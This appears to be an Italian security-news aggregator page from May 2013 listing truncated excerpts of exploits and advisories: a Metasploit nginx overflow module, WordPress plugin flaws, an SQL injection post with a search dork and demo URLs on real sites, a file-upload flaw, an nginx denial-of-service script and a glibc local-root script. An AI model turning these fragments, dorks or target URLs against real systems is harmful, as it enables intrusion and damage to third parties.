##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.
The exploit first triggers an integer overflow in the ngx_http_parse_chunked()...
Leggi il seguito »
Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
WordPress Spider Catalog Multiple Vulnerabilities
22 maggio 2013 - Fonte: http://www.mondounix.com
Author: Janek Vind "waraxe" Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-105.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spider Catalog is the best WordPress catalog plugin. It is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the catalog. http://wordpress.org/extend/plugins/catalog/ http://web-dorado.com/products/wordpress-catalog.html Vulnerable is current version 1.4.6, older versions...
Leggi il seguito »
WordPress Spider Event Calendar Multiple Vulnerabilities
22 maggio 2013 - Fonte: http://www.mondounix.com
Author: Janek Vind "waraxe" Date: 22. May 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-104.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spider Event Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendar available in WordPress Directory. If you have problem with organizing your WordPress Calendar events and displaying them in a calendar format, then Spider WordPress Calendar Plugin is the best solution. http://wordpress.org/extend/plugins/spider-event-calendar/ http://web-dorado.com/products/wordpress-calendar.html Vulnerable...
Leggi il seguito »
WordPress Flagallery-Skins SQL Injection
22 maggio 2013 - Fonte: http://www.mondounix.com
############## # Exploit Title : Wordpress Flagallery-skins plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Home : www.ashiyane.org # # Security Risk : Medium # # Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist= # # Tested on: Linux # ############## #Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL] # # #DEm0: # http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27 # # http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27 # # http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27 # #...
Leggi il seguito »
Moxiecode Image Manager 3.1.5 Shell Upload
21 maggio 2013 - Fonte: http://www.mondounix.com
I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager). This is commercial plugin for TinyMCE. It concerns as MCImageManager, as all web applications which have MCImageManager in their bundle. These are Arbitrary File Uploading vulnerabilities, which lead to Code Execution on IIS and Apache web servers. ------------------------- Affected products: ------------------------- Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions. ------------------------- Affected vendors: ------------------------- Moxiecode http://www.moxiecode.com ---------- Details: ---------- Arbitrary File Uploading (WASC-31): http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html Execution...
Leggi il seguito »
Nginx 1.3.9 / 1.4.0 Denial Of Service
21 maggio 2013 - Fonte: http://www.mondounix.com
# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028)
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & Windows XP (nginx v1.4.0)
# CVE : CVE-2013-2028
import httplib
import time
import socket
import sys
import os
# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
packet = 0
def chunk(data, chunk_size):
chunked = ""
chunked += "%s\r\n" % (chunk_size)
chunked += "%s\r\n" % (data)
chunked +=...
Leggi il seguito »
Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root
21 maggio 2013 - Fonte: http://www.mondounix.com
#!/bin/sh # # [+] Glibc <= 2.12.x, 2.11.3, 2.12.2 LD_AUDIT libmemusage.so local root exploit # # Edited by Todor Donev (todor dot donev at gmail dot com) # This is another exploit for CVE-2010-3856 # # Thanks to Tavis 'taviso' Ormandy, zx2c4, Marco 'raptor' Ivaldi, Stiliyan Angelov # and Tsvetelina Emirska # # Another exploits: # http://www.0xdeadbeef.info/exploits/raptor_ldaudit # http://www.0xdeadbeef.info/exploits/raptor_ldaudit2 # http://www.exploit-db.com/exploits/18105/ # http://seclists.org/fulldisclosure/2010/Oct/257 # http://seclists.org/bugtraq/2010/Oct/200 # echo "[+] Setting umask to 0 so we have world writable files." umask 0 echo "[+] Preparing binary payload.." cat > /tmp/payload.c...
Leggi il seguito »
